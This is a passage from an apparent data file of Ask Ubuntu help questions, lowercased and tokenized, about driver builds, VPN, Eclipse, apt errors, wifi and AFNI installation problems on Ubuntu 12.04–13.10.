~/downloads/0002-input-wacom-add-support-for-three-new-intuos-devices.patch then i compiled the driver : ./autogen.sh ./make and did a backup and copy the new diver like so : sudo cp /lib/modules/ $ ( uname -r ) /kernel/drivers/input/tablet/wacom.ko /lib/modules/ $ ( uname -r ) /kernel/drivers/input/tablet/wacom.ko.bak sudo cp 3.7/wacom.ko /lib/modules/ $ ( uname -r ) /kernel/drivers/input/tablet/wacom.ko sudo depmod -a step 2 ( xserver driver ) i did n't need to patch the xserver driver . because it works on ubunt 13.10 so i compiled it : cd ../xf86-input-wacom ./autogen.sh ./configure -- prefix=/usr -- libdir=/usr/lib make ... and copied it over : sudo cp /usr/lib/xorg/modules/input/wacom_drv.so /usr/lib/xorg/modules/input/wacom_drv.so.bak sudo cp src/.libs/wacom_drv.so /usr/lib/xorg/modules/input/wacom_drv.so i rebooted the system , but still the tablet is not recognized . did i miss something ?
384309	starting arachnophilia from shell script	i am using arachnophilia which under older versions of ubuntu , i was able to start using a shell script . after updating to 13.04 the shell script wo n't work . i opened up a terminal then cut and pasted each of the script commands individually each step worked in the terminal , but the shell script wo n't work . i double checked the properties including the execute setting , still the best i can get is the script file opened to edit . how to solve this ?
384316	ipsec works on ios but not vpnc	i have an amahi home server running on my home network with an ipsec vpn server running on it . the server is configured in pre-shared key mode . it is behind a fios router and udp ports 500 and 4500 are forwarded to the server . i can connect to my vpn using the native ipsec support on ios 7 ( both my phone and my ipad ) . i can not , however , connect from my laptop running ubuntu 13.10 desktop . i have installed network-manager-vpnc . when i try to connect to the vpn using that , the popup informs me that the connection to my server failed . i have installed vpnc and tried to connect from the command line . the redacted configuration file contains : ipsec gateway xyxyxy.yourhda.com ipsec id qazws ipsec secret secretsecret ike authmode psk xauth username myuid nat traversal mode cisco-udp when i run sudo vpnc-connect vpnname -- debug 2 it hangs with : s4.3 am packet_1 [ 2013-11-30 13:53:55 ] vpnc-connect : no response from target also , the syslog shows the following : < info > vpn connection 'tytyty ' ( connect ) reply received . scplugin-ifupdown : devices added ( path : /sys/devices/virtual/net/tun0 , iface : tun0 ) scplugin-ifupdown : device added ( path : /sys/devices/virtual/net/tun0 , iface : tun0 ) : no ifupdown configuration found . < warn > /sys/devices/virtual/net/tun0 : could n't determine device driver ; ignoring ... withdrawing workstation service for tun0 . does anybody have any thoughts ? plenty of the online forum posts show that the nat traversal mode is a solution , but that obviously did n't help . there was also plenty of mention of local port 10000 and i tried that as well . i appreciate any help the community can offer .
384318	eclipse does not start	i am new to ubuntu ( 12.04 lts ) . i installed eclipse a few days ago , today i installed the android plugin , now i can not start eclipse anymore . i get an errormessage refrerring to the log data . i tried to delete the metadata , eclipse cofigs , and i tried eclipse -clean . i also reinstalled it . nothing helped me , still the same error . ! session 2013-11-30 19:52:01.107 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - eclipse.buildid=i20110613-1736 java.version=1.7.0_45 java.vendor=oracle corporation bootloader constants : os=linux , arch=x86_64 , ws=gtk , nl=de_de command-line arguments : -os linux -ws gtk -arch x86_64 ! entry org.eclipse.osgi 4 0 2013-11-30 19:52:02.453 ! message application error ! stack 1 java.lang.unsatisfiedlinkerror : could not load swt library . reasons : no swt-gtk-3740 in java.library.path no swt-gtk in java.library.path ca n't load library : /home/phil/.swt/lib/linux/x86_64/libswt-gtk-3740.so ca n't load library : /home/phil/.swt/lib/linux/x86_64/libswt-gtk.so at org.eclipse.swt.internal.library.loadlibrary ( library.java:285 ) at org.eclipse.swt.internal.library.loadlibrary ( library.java:194 ) at org.eclipse.swt.internal.c. < clinit > ( c.java:21 ) at org.eclipse.swt.internal.converter.wcstombcs ( converter.java:63 ) at org.eclipse.swt.internal.converter.wcstombcs ( converter.java:54 ) at org.eclipse.swt.widgets.display. < clinit > ( display.java:132 ) at org.eclipse.ui.internal.workbench.createdisplay ( workbench.java:695 ) at org.eclipse.ui.platformui.createdisplay ( platformui.java:161 ) at org.eclipse.ui.internal.ide.application.ideapplication.createdisplay ( ideapplication.java:153 ) at org.eclipse.ui.internal.ide.application.ideapplication.start ( ideapplication.java:95 ) at org.eclipse.equinox.internal.app.eclipseapphandle.run ( eclipseapphandle.java:196 ) at org.eclipse.core.runtime.internal.adaptor.eclipseapplauncher.runapplication ( eclipseapplauncher.java:110 ) at org.eclipse.core.runtime.internal.adaptor.eclipseapplauncher.start ( eclipseapplauncher.java:79 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.run ( eclipsestarter.java:344 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.run ( eclipsestarter.java:179 ) at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) at sun.reflect.nativemethodaccessorimpl.invoke ( nativemethodaccessorimpl.java:57 ) at sun.reflect.delegatingmethodaccessorimpl.invoke ( delegatingmethodaccessorimpl.java:43 ) at java.lang.reflect.method.invoke ( method.java:606 ) at org.eclipse.equinox.launcher.main.invokeframework ( main.java:622 ) at org.eclipse.equinox.launcher.main.basicrun ( main.java:577 ) at org.eclipse.equinox.launcher.main.run ( main.java:1410 ) at org.eclipse.equinox.launcher.main.main ( main.java:1386 ) thanks for your help : )
384319	how to improve seperate root and home model by encription ?	i use separated partitions for home and root dirs . it satisfies me well , i can easily reinstall os if i need and not touching whole home dir . this was enough because so far i did n't have to encrypt home partition . is it possible to connect such way of os installation with home dir encryption and after that even get painless os reinstallation ?
384320	ubuntu_dists_saucy_main_i18n_translation-en % 5fus : why do i get errror with this	after installing 12.04 , i ran into some language selector problem i guess.. update manager , software center would crash.. going through this support , sudo rm /var/lib/apt/lists/* -vf and running update fixed it . in saucy the same is not working . help is highly appreciated . have hybrid graphics in laptop , i5 , amd7400 . the drivers 13.11betav9.4 drivers from amd site are running fine . i wonder what is this translation all about . my native language is not english still.. just give a language . this is the last i tried before giving up . all suggestions are welcome . it reinstalls pretty fast clocked at 7min.. but ! ! ! ahhh errors : ( dodge @ sequoia : ~ $ sudo apt-get autoclean [ sudo ] password for dodge : reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_saucy_main_i18n_translation-en % 5fus e : the package lists or status file could not be parsed or opened . dodge @ sequoia : ~ $ sudo apt-get clean dodge @ sequoia : ~ $ sudo apt-get -f install reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_saucy_main_i18n_translation-en % 5fus e : the package lists or status file could not be parsed or opened . dodge @ sequoia : ~ $
384322	apple keyboard with numberic keypad ubuntu 13.10	sorry if this has been asked before , but i was wondering if the apple keyboard with numeric keypad will work under ubuntu 13.10 .
384324	speakers not working	i can hear the sound from my laptop speakers on the startup but after that when i try to play any music on vlc i do n't hear any sound . i ca n't even hear any sound on youtube so it 's not the problem with vlc . if i try running any sound by guest user then it works .
384326	i canâ´t install microsoft office 2010	i re installed ubuntu many times and i still ca n't get it working . i get this : error in pol_wine wine seems to have crashed if your program is running , just ignore this message and then i press next i get this : error in pol_shortcut binary not found : winword.exe have you installed the program to the default location ? and then this : error in pol_shortcut binary not found : excel.exe have you installed the program to the default location ? then this : error in pol_shortcut binary not found : powerpnt.exe have you installed the program to the default location ? then this : error in pol_shortcut binary not found : onenote.exe have you installed the program to the default location ? etc . i have bumblebee installed using a gt555m . and the ms word is a 32 bit version and i already tried other ms word installations . i installed a game called supermeatboy using playonlinux and that works fine .
384332	how to install radeon 5770 video card accelerator	recently installed ubuntu 13.10 x64 . example , playing in face book farmvill , a yellow based reminder pops up '' u need to install video accelerator '' the game is very slow and sluggish . video card : his radeon hd 5770 ice q5 turbo plz . only facts , no guessing ...
384334	compiz window switchers are not visible	no matter what window switcher i select in compizconfig , the behavior is the same : when i press alt-tab , the next window is simply brought to the front . no window switcher is ever displayed , so i never know how many times i have to press alt-tab to get to a particular window . how do i get my window switchers back ? running 12.04 with cinnamon .
384335	ubuntu 13.1 recent upgrade	no more web-cam or camera support ? i tried 'camera ' app ; no avail . program launches but not working ; no picture or video available . 12.04 had camera support ; what happened ? using acer aspire one computer .
384336	newly installed 12.04 can not connect to internet	i am a comp sci student and i had to replace my dev laptop with an old dell inspiron 1150 . first tried loading ubuntu 13.10 but it would n't render graphics correctly on this old machine , so i put on 12.04 lts instead . during install from dvd , it recognized internet connection ( i had an ethernet cable plugged into my wireless router and the linksys wireless-g adapter plugged into the bus , so i do n't know which connection it was using ) . but now that the os is installed , it says network disconnected and i ca n't get it to recognize either connection . the output of sudo ifconfig is : link encap : local loopback inet addr:127.0.0.1 mask 255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:192 errors:0 dropped:0 overruns:0 frame:0 tx packets:192 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:15744 ( 15.7 kb ) tx bytes:15744 ( 15.7 kb ) and the results of sudo lshw -c network is : *-network unclaimed description : ethernet controller product : bcm4401 100base-t vendor : braodcom corporation physical id : 1 bus info : pci @ 0000:02:01.0 version : 01 width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : latency=32 resources : memory : fcffe00-fcffffff memory : fd000000-fd003fff i manually typed this in , so hoepfully no typos
384337	my hp pavilion g6 2230tx laptop heating too much and fan speed too high when i am using ubuntu	my hp pavilion g6 2230tx with intel i3 rd gen pro and radeon 1gb graphic card laptop heating too much and fan speed too high when i am using ubuntu there is any solution for my laptop ? please help me which type of extension format software support ubuntu ?
384338	do i need to unzip the iso to burn it ?	i have successfully : downloaded ubuntu 12.04 32-bit installation file unzipped the file using winzip burned the unzipped files to a dvd , using sonic recordnow i am experiencing the following difficulties : the dvd is not bootable when i manually try to execute wubi.exe , i get a message saying `` an installable virtual device driver failed dll initialization . what am i doing wrong ? how do i get ubuntu to run ?
384339	remove option from `` open with ... '' menu item ?	i 'm using 13.10 . i want to remove libreoffice writer from my `` open with ... '' menu for html , xml and tex documents , because i almost never use writer ( except when someone sends my a word document ) and i certainly never use it for html , xml or tex . i have found the following related posts : how can i remove / change the “open with” list ? how to change “open with” with force and fury ? [ duplicate ] remove wine 's notepad from “open with” options ( 1 ) suggests : enter the contextual menu of the file and go to the properties of it . then , go to open with tab , right click on the application you want to remove and click on forget association . however there is no `` forget association option '' in properties > open with ( 2 ) in re this solution here is the mimetypes from /usr/share/applications/libreoffice-writer.desktop : mimetype=application/vnd.oasis.opendocument.text ; application/vnd.oasis.opendocument.text-template ; application/vnd.oasis.opendocument.text-web ; application/vnd.oasis.opendocument.text-master ; application/vnd.sun.xml.writer ; application/vnd.sun.xml.writer.template ; application/vnd.sun.xml.writer.global ; application/msword ; application/vnd.ms-word ; application/x-doc ; application/x-hwp ; application/rtf ; text/rtf ; application/vnd.wordperfect ; application/wordperfect ; application/vnd.lotus-wordpro ; application/vnd.openxmlformats-officedocument.wordprocessingml.document ; application/vnd.ms-word.document.macroenabled.12 ; application/vnd.openxmlformats-officedocument.wordprocessingml.template ; application/vnd.ms-word.template.macroenabled.12 ; application/vnd.ms-works ; application/vnd.stardivision.writer-global ; application/x-extension-txt ; application/x-t602 ; ( line breaks added for legibility ) . i do not know whether `` i had to manually change all mentions of userapp-xnview.sh-c2f5d4.desktop to xnview.desktop '' in ( 2 ) means change in .desktop files ( i.e . in my case change contents libreoffice-writer.desktop ) or change the name of of the desktop file userapp-xnview.sh-c2f5d4.desktop to xnview.desktop . but , there are no mentions of userapp-xnview.sh-c2f5d4.desktop in libreoffice-writer.desktop nor do i have any userapp-xnview.sh-c2f5d4.desktop in ~/.local/share/applications/mimapps.list or /usr/share/applications . i have not ~/.local/share/applications/defaults.list ( should i create one ? in which case , what should be its contents ; defaults work fine ) and here is contents of ~/.local/share/applications/mimapps.list : [ added associations ] application/xml=komodo-edit.desktop ; text/html=komodo-edit.desktop ; [ default applications ] application/xml=komodo-edit.desktop text/html=komodo-edit.desktop which makes no reference to writer . i have no /.local/share/applications/libreoffice-writer.desktop file . ( 3 ) consult response to ( 2 ) . any suggestions ?
384340	ubuntu and wine	can ubuntu be used with wine to load older windows 98 games rather than using a virtual box . i have several titles that just refuse to run with my newer hardware . i have another machine with slower hardware and older graphics cards that i can use to do this . or do you use a virtual box install on linux to accomplish this .
384344	problem connecting to some wifi networks	i 'm using dell latitude e5530 running ubuntu 13.04 and i have problems with connecting to some wifi networks . while i am able to connect to most of wifi , in some cases system is repeatedly asking me to provide wpa / wpa2 personal password and eventually does n't connect . my kernel is : 3.8.0-33-generic and my network card details are : 02:00.0 network controller [ 0280 ] : broadcom corporation bcm43228 802.11a/b/g/n [ 14e4:4359 ] 0c:00.0 ethernet controller [ 0200 ] : broadcom corporation netxtreme bcm5761 gigabit ethernet pcie [ 14e4:1681 ] ( rev 10 ) i 've already tried this solution but it completely disabled any wifi so i went back . i am currently using bcmwl-kernel-source proprietary drivers . any help will be greatly appreciated .
384345	ca n't mount cd rom	i am booting the ubuntu server iso file directly . i am not using the usb or cd install so when i try to install i get up to where it says mount cdrom . my computer does n't have a cdrom by the way so how do i get round this ?
384346	laptop bricked after installing ubuntu 13.10	let me explain the situation : i had windows 7 installed on my laptop and i tried to install ubuntu 13.10 on it ( i completely erased the hard drive ) . after that my laptop ca n't access the bios or boot from cd/dvd ! . when i press enter or the right arrow key it boots ubuntu 13.10 but after the splash screen i just get a black screen with a blinking cursor . edit : when i press f11 it boots to efi shell but i do n't know what to do . edit solution : for those with the same problem press f11 when booting , when you get into the efi shell you need to enter in the cd directory and boots from there
384349	how to install afni	these are the instructions given to me for installing afni , yet when i completed them , it still tells me 'command not found ' for the 'afni ' command . sudo yum install libxp tcsh sudo yum install pyqt4 r ( this was not correct , but i was able to get it to work with this ) : sudo apt-get install libxp6 tcsh sudo apt-get install python-qt4 r-base then : cd mkdir abin then it says to choose one of these binaries . i was n't sure which one to choose , but i chose # 3 : linux_openmp : for multi-cpu systems , ( needs libgomp ) linux_openmp_64 : 64-bit version of the same linux_xorg7 : otherwise current linux package linux_xorg7_64 : 64-bit version of the same then : set package = linux_xorg7 wget http : //afni.nimh.nih.gov/pub/dist/tgz/ $ package.tgz tar xvfz $ package.tgz mv $ package/* abin rmdir $ package and finally , add the afni package directory ~/abin to your path : echo 'set path = ( $ path ~/abin ) ' > > ~/.cshrc then it said to log out and log back in so the programs are recognized in the path , and then to try these commands upon login : afni suma uber_subject.py only the last one worked . the others said 'command not found ' . what went wrong ? when i do 'echo $ path ' it shows this : /usr/lib/lightdm/lightdm /usr/local/sbin /usr/local/bin /usr/sbin /usr/bin /sbin /bin /usr/games /usr/local/games /home/owner/abin /home/owner/abin the output of ls -l /home/owner/abin is : -rwxr-xr-x 1 owner owner 2134 nov 29 21:01 @ install_afniretinodemo -rwxr-xr-x 1 owner owner 1892 nov 29 21:01 @ install_fatcat_demo -rwxr-xr-x 1 owner owner 3465 nov 29 21:01 @ install_instacorr_demo -rwxr-xr-x 1 owner owner 1683 nov 29 21:01 @ install_meica_demo -rwxr-xr-x 1 owner owner 5269 nov 29 21:01 @ install_rsfmri_motion_group_demo -rwxr-xr-x 1 owner owner 2609 nov 29 21:01 @ install_tsrestmoviedemo -rwxr-xr-x 1 owner owner 902 nov 29 21:01 @ isoblique -rwxr-xr-x 1 owner owner 3864 nov 29 21:01 @ isomasks -rwxr-xr-x 1 owner owner 11329870 nov 29 21:01 isosurface -rwxr-xr-x 1 owner owner 3521 nov 29 21:01 killer.h -rwxr-xr-x 1 owner owner 18132 nov 29 21:01 level2.r -rwxr-xr-x 1 owner owner 101340 nov 29 21:01 lib_afni1d.py -rw-r -- r -- 1 owner owner 221272 nov 29 21:01 libcoxplot.a -rw-r -- r -- 1 owner owner 220774 nov 29 21:01 libf2c.a -rw-r -- r -- 1 owner owner 18582 nov 29 20:53 libglws.a -rw-r -- r -- 1 owner owner 1299298 nov 29 21:00 libgts.a -rwxr-xr-x 1 owner owner 11671 nov 29 21:01 lib_matplot.py -rw-r -- r -- 1 owner owner 8400460 nov 29 21:01 libmri.a -rw-r -- r -- 1 owner owner 750488 nov 29 21:01 libmrix.a -rwxr-xr-x 1 owner owner 67662 nov 29 21:01 lib_qt_gui.py -rw-r -- r -- 1 owner owner 61316 nov 30 14:40 lib_qt_gui.pyc -rwxr-xr-x 1 owner owner 17868 nov 29 21:01 lib_realtime.py -rwxr-xr-x 1 owner owner 3929 nov 29 21:01 lib_rr_plot.py -rwxr-xr-x 1 owner owner 55020 nov 29 21:01 lib_subjects.py -rw-r -- r -- 1 owner owner 46258 nov 30 14:40 lib_subjects.pyc -rw-r -- r -- 1 owner owner 7842396 nov 29 20:57 libsuma.a -rwxr-xr-x 1 owner owner 29947 nov 29 21:01 lib_surf_clustsim.py -rw-r -- r -- 1 owner owner 8194 nov 29 21:01 lib_system_check.py -rwxr-xr-x 1 owner owner 10148 nov 29 21:01 lib_textdata.py -rw-r -- r -- 1 owner owner 9272 nov 30 14:40 lib_textdata.pyc -rwxr-xr-x 1 owner owner 33042 nov 29 21:01 lib_timing.py -rwxr-xr-x 1 owner owner 31904 nov 29 21:01 lib_uber_align.py -rwxr-xr-x 1 owner owner 23453 nov 29 21:01 lib_uber_skel.py -rwxr-xr-x 1 owner owner 66434 nov 29 21:01 lib_uber_subject.py -rw-r -- r -- 1 owner owner 55296 nov 30 14:40 lib_uber_subject.pyc -rwxr-xr-x 1 owner owner 23340 nov 29 21:01 lib_uber_ttest.py -rw-r -- r -- 1 owner owner 258384 nov 29 21:01 libvolpack.a -rwxr-xr-x 1 owner owner 4517 nov 29 21:01 lib_wx.py -rwxr-xr-x 1 owner owner 2432 nov 29 21:01 list_struct.h -rwxr-xr-x 1 owner owner 23775 nov 29 21:01 lpc_align.py -rwxr-xr-x 1 owner owner 16378 nov 29 21:01 machdep.h -rwxr-xr-x 1 owner owner 11268219 nov 29 21:01 makecolormap -rwxr-xr-x 1 owner owner 33562 nov 29 21:01 @ makelabeltable -rwxr-xr-x 1 owner owner 8745 nov 29 21:01 @ make_plug_diff -rwxr-xr-x 1 owner owner 4141 nov 29 21:01 make_pq_script.py -rwxr-xr-x 1 owner owner 91329 nov 29 21:01 make_random_timing.py -rwxr-xr-x 1 owner owner 15388 nov 29 21:01 @ make_stim_file -rwxr-xr-x 1 owner owner 11915 nov 29 21:01 make_stim_times.py -rwxr-xr-x 1 owner owner 11282021 nov 29 21:01 mapicosahedron -rwxr-xr-x 1 owner owner 3496097 nov 29 20:52 map_trackid -rwxr-xr-x 1 owner owner 9080 nov 29 20:46 mayo_analyze -rwxr-xr-x 1 owner owner 3975 nov 29 21:01 mcw_glob.h -rwxr-xr-x 1 owner owner 3483 nov 29 21:01 mcw_malloc.h drwxr-xr-x 4 owner owner 4096 nov 29 20:33 meica.libs -rwxr-xr-x 1 owner owner 26764 nov 29 20:33 meica.py -rwxr-xr-x 1 owner owner 1088640 nov 29 20:33 mgh_wh_template+tlrc.brik -rwxr-xr-x 1 owner owner 3246 nov 29 20:33 mgh_wh_template+tlrc.head -rwxr-xr-x 1 owner owner 141 nov 29 21:01 misc_math.h -rw-r -- r -- 1 owner owner 6244968 nov 29 20:33 mni152_1mm_uni+tlrc.brik.gz -rw-r -- r -- 1 owner owner 4686 nov 29 20:33 mni152_1mm_uni+tlrc.head -rwxr-xr-x 1 owner owner 1726099 nov 29 20:33 mnia_caez_colin27_t1_18+tlrc.brik.gz -rwxr-xr-x 1 owner owner 2309 nov 29 20:33 mnia_caez_colin27_t1_18+tlrc.head -rwxr-xr-x 1 owner owner 3657483 nov 29 20:33 mnia_caez_gw_18+tlrc.brik.gz -rwxr-xr-x 1 owner owner 2658 nov 29 20:33 mnia_caez_gw_18+tlrc.head -rwxr-xr-x 1 owner owner 166760 nov 29 20:33 mnia_caez_lr_18+tlrc.brik.gz -rwxr-xr-x 1 owner owner 2771 nov 29 20:33 mnia_caez_lr_18+tlrc.head -rwxr-xr-x 1 owner owner 270372 nov 29 20:33 mnia_caez_ml_18+tlrc.brik.gz -rwxr-xr-x 1 owner owner 18038 nov 29 20:33 mnia_caez_ml_18+tlrc.head -rwxr-xr-x 1 owner owner 238153 nov 29 20:33 mnia_caez_mpm_18+tlrc.brik.gz -rwxr-xr-x 1 owner owner 11872 nov 29 20:33 mnia_caez_mpm_18+tlrc.head -rwxr-xr-x 1 owner owner 1726099 nov 29 20:33 mnia_caez_n27+tlrc.brik.gz -rwxr-xr-x 1 owner owner 2309 nov 29 20:33 mnia_caez_n27+tlrc.head -rwxr-xr-x 1 owner owner 3240810 nov 29 20:33 mnia_caez_pmaps_18+tlrc.brik.gz -rwxr-xr-x 1 owner owner 18134 nov 29 20:33 mnia_caez_pmaps_18+tlrc.head -rwxr-xr-x 1 owner owner 861626 nov 29 20:33 mni_avg152t2+tlrc.brik.gz -rwxr-xr-x 1 owner owner 4983 nov 29 20:33 mni_avg152t2+tlrc.head -rwxr-xr-x 1 owner owner 1726099 nov 29 20:33 mni_caez_n27+tlrc.brik.gz -rwxr-xr-x 1 owner owner 2764 nov 29 20:33 mni_caez_n27+tlrc.head -rwxr-xr-x 1 owner owner 266078 nov 29 20:33 mni_epi+tlrc.brik.gz -rwxr-xr-x 1 owner owner 4631 nov 29 20:33 mni_epi+tlrc.head -rwxr-xr-x 1 owner owner 5545 nov 29 20:52 model_beta.so -rwxr-xr-x 1 owner owner 5160 nov 29 20:52 model_constant.so -rwxr-xr-x 1 owner owner 13916 nov 29 20:52 model_conv_cosine4.so -rwxr-xr-x 1 owner owner 15035 nov 29 20:52 model_conv_diffgamma.so -rwxr-xr-x 1 owner owner 8883 nov 29 20:52 model_convgamma2a.so -rwxr-xr-x 1 owner owner 8183 nov 29 20:52 model_convgamma.so -rwxr-xr-x 1 owner owner 31047 nov 29 20:52 model_demri_3.so -rwxr-xr-x 1 owner owner 5416 nov 29 20:52 model_diffexp.so -rwxr-xr-x 1 owner owner 5262 nov 29 20:52 model_diffusion.so -rwxr-xr-x 1 owner owner 5598 nov 29 20:52 model_expmemri3.so -rwxr-xr-x 1 owner owner 5309 nov 29 20:52 model_expmemri.so -rwxr-xr-x 1 owner owner 9428 nov 29 20:52 model_expr2.so -rwxr-xr-x 1 owner owner 5248 nov 29 20:52 model_exp.so -rwxr-xr-x 1 owner owner 5457 nov 29 20:52 model_gammavar.so -rwxr-xr-x 1 owner owner 5346 nov 29 20:52 model_linear.so -rwxr-xr-x 1 owner owner 5450 nov 29 20:52 model_linplusort.so -rwxr-xr-x 1 owner owner 9364 nov 29 20:52 model_michaelis_menton.so -rwxr-xr-x 1 owner owner 5089 nov 29 20:52 model_null.so -rwxr-xr-x 1 owner owner 5289 nov 29 20:52 model_quadratic.so -rwxr-xr-x 1 owner owner 5686 nov 29 20:52 model_sinewave_apf.so -rwxr-xr-x 1 owner owner 5345 nov 29 20:52 model_sinewave_ap.so -rwxr-xr-x 1 owner owner 5447 nov 29 20:52 model_squarewave_apf.so -rwxr-xr-x 1 owner owner 5382 nov 29 20:52 model_squarewave_ap.so -rwxr-xr-x 1 owner owner 5546 nov 29 20:52 model_trnglwave_apf.so -rwxr-xr-x 1 owner owner 5485 nov 29 20:52 model_trnglwave_ap.so -rwxr-xr-x 1 owner owner 5088 nov 29 20:52 model_zero.so -rwxr-xr-x 1 owner owner 8004 nov 29 21:01 module_test_lib.py -rw-r -- r -- 1 owner owner 6312 nov 30 14:40 module_test_lib.pyc -rwxr-xr-x 1 owner owner 4947 nov 29 21:01 @ move.to.series.dirs -rwxr-xr-x 1 owner owner 206652 nov 29 20:51 mpeg_encode -rwxr-xr-x 1 owner owner 6496 nov 29 21:01 mri_dicom_stuff.h -rwxr-xr-x 1 owner owner 90294 nov 29 21:01 mrilib.h -rwxr-xr-x 1 owner owner 3434886 nov 29 20:43 mritopgm -rwxr-xr-x 1 owner owner 2696 nov 29 21:01 mri_warpfield.h -rwxr-xr-x 1 owner owner 1986 nov 29 21:01 multivector.h -rwxr-xr-x 1 owner owner 6890 nov 29 20:51 mycat -rwxr-xr-x 1 owner owner 3434851 nov 29 20:51 myget -rwxr-xr-x 1 owner owner 11095 nov 29 21:01 neuro_deconvolve.py -rwxr-xr-x 1 owner owner 3435203 nov 29 20:46 nicat -rwxr-xr-x 1 owner owner 3439008 nov 29 20:48 niccc -rwxr-xr-x 1 owner owner 69232 nov 29 21:01 nifti1.h -rwxr-xr-x 1 owner owner 25666 nov 29 21:01 nifti1_io.h -rwxr-xr-x 1 owner owner 118029 nov 29 20:47 nifti1_test -rwxr-xr-x 1 owner owner 8385 nov 29 21:01 nifticdf.h -rwxr-xr-x 1 owner owner 202223 nov 29 20:46 nifti_tool -rwxr-xr-x 1 owner owner 3452960 nov 29 20:48 niml_feedme -rwxr-xr-x 1 owner owner 49354 nov 29 21:01 niml.h -rwxr-xr-x 1 owner owner 797 nov 29 21:01 @ noext -rwxr-xr-x 1 owner owner 7876 nov 29 21:01 @ noisyskullstrip -rwxr-xr-x 1 owner owner 1619 nov 29 21:01 @ nopound -rwxr-xr-x 1 owner owner 3189 nov 29 21:01 @ np -rwxr-xr-x 1 owner owner 3434883 nov 29 20:43 nsize -rwxr-xr-x 1 owner owner 19944 nov 29 21:01 option_list.py -rw-r -- r -- 1 owner owner 15044 nov 30 14:40 option_list.pyc -rwxr-xr-x 1 owner owner 636 nov 29 21:01 @ parse_afni_name -rwxr-xr-x 1 owner owner 565 nov 29 21:01 @ parse_name -rwxr-xr-x 1 owner owner 11253274 nov 29 21:01 parsename -rwxr-xr-x 1 owner owner 317923 nov 29 20:33 paxinos_elsevier_tissue_lores+tlrc.brik.gz -rwxr-xr-x 1 owner owner 5076 nov 29 20:33 paxinos_elsevier_tissue_lores+tlrc.head -rwxr-xr-x 1 owner owner 9467 nov 29 20:52 plug_3ddot.so -rwxr-xr-x 1 owner owner 19628 nov 29 20:52 plug_3ddump_v2.so -rwxr-xr-x 1 owner owner 8459 nov 29 20:52 plug_3ddup.so -rwxr-xr-x 1 owner owner 446917 nov 29 20:53 plug_3dsvm.so -rwxr-xr-x 1 owner owner 24075 nov 29 20:52 plug_4ddump.so -rwxr-xr-x 1 owner owner 24403 nov 29 20:52 plug_afnihistory.so -rwxr-xr-x 1 owner owner 19302 nov 29 20:53 plug_asla3d3.so -rwxr-xr-x 1 owner owner 28239 nov 29 20:52 plug_betafit.so -rwxr-xr-x 1 owner owner 13850 nov 29 20:52 plug_clust.so -rwxr-xr-x 1 owner owner 6749 nov 29 20:52 plug_compress.so -rwxr-xr-x 1 owner owner 8651 nov 29 20:52 plug_coorder.so -rwxr-xr-x 1 owner owner 11543 nov 29 20:52 plug_copy.so -rwxr-xr-x 1 owner owner 373154 nov 29 20:53 plug_crender.so -rwxr-xr-x 1 owner owner 59351 nov 29 20:52 plug_deconvolve.so -rwxr-xr-x 1 owner owner 45070 nov 29 20:53 plug_delay_v2.so -rwxr-xr-x 1 owner owner 104311 nov 29 20:52 plug_drawdset.so -rwxr-xr-x 1 owner owner 28058 nov 29 20:52 plug_edit.so -rwxr-xr-x 1 owner owner 20423 nov 29 20:53 plug_extract.so -rwxr-xr-x 1 owner owner 16036 nov 29 20:53 plug_fourier.so -rwxr-xr-x 1 owner owner 9410 nov 29 20:53 plug_hemisub.so -rwxr-xr-x 1 owner owner 18399 nov 29 20:52 plug_histog_multi.so -rwxr-xr-x 1 owner owner 32771 nov 29 20:52 plug_histog.so -rwxr-xr-x 1 owner owner 13098 nov 29 20:52 plug_imreg.so -rwxr-xr-x 1 owner owner 13511 nov 29 20:52 plug_l1fit.so -rwxr-xr-x 1 owner owner 20026 nov 29 20:52 plug_lsqfit.so -rwxr-xr-x 1 owner owner 17777 nov 29 20:52 plug_maskave.so -rwxr-xr-x 1 owner owner 20984 nov 29 20:53 plug_maskcalc.so -rwxr-xr-x 1 owner owner 60485 nov 29 20:53 plug_maxima.so -rwxr-xr-x 1 owner owner 72383 nov 29 20:52 plug_nlfit.so -rwxr-xr-x 1 owner owner 34478 nov 29 20:52 plug_notes.so -rwxr-xr-x 1 owner owner 22417 nov 29 20:52 plug_nth_dataset.so -rwxr-xr-x 1 owner owner 54029 nov 29 20:52 plug_nudge.so -rwxr-xr-x 1 owner owner 3443823 nov 29 20:47 plugout_drive -rwxr-xr-x 1 owner owner 3439465 nov 29 20:44 plugout_ijk -rwxr-xr-x 1 owner owner 3439492 nov 29 20:44 plugout_tt -rwxr-xr-x 1 owner owner 3444047 nov 29 20:43 plugout_tta -rwxr-xr-x 1 owner owner 37831 nov 29 20:53 plug_permtest.so -rwxr-xr-x 1 owner owner 18348 nov 29 20:52 plug_power.so -rwxr-xr-x 1 owner owner 146125 nov 29 20:52 plug_realtime.so -rwxr-xr-x 1 owner owner 8869 nov 29 20:52 plug_rename.so -rwxr-xr-x 1 owner owner 4273 nov 29 20:52 plug_render.so -rwxr-xr-x 1 owner owner 24899 nov 29 20:53 plug_reorder.so -rwxr-xr-x 1 owner owner 27546 nov 29 20:53 plug_retroicor.so -rwxr-xr-x 1 owner owner 187812 nov 29 20:53 plug_roiedit.so -rwxr-xr-x 1 owner owner 15365 nov 29 20:52 plug_roiplot.so -rwxr-xr-x 1 owner owner 19929 nov 29 20:52 plug_scatplot.so -rwxr-xr-x 1 owner owner 19544 nov 29 20:52 plug_second_dataset.so -rwxr-xr-x 1 owner owner 8731 nov 29 20:52 plug_stats.so -rwxr-xr-x 1 owner owner 15797 nov 29 20:53 plug_stavg.so -rwxr-xr-x 1 owner owner 42441 nov 29 20:52 plug_tag.so -rwxr-xr-x 1 owner owner 14919 nov 29 20:53 plug_threshold.so -rwxr-xr-x 1 owner owner 4274 nov 29 20:52 plug_ttget.so -rwxr-xr-x 1 owner owner 44427 nov 29 20:53 plug_vol2surf.so -rwxr-xr-x 1 owner owner 24159 nov 29 20:52 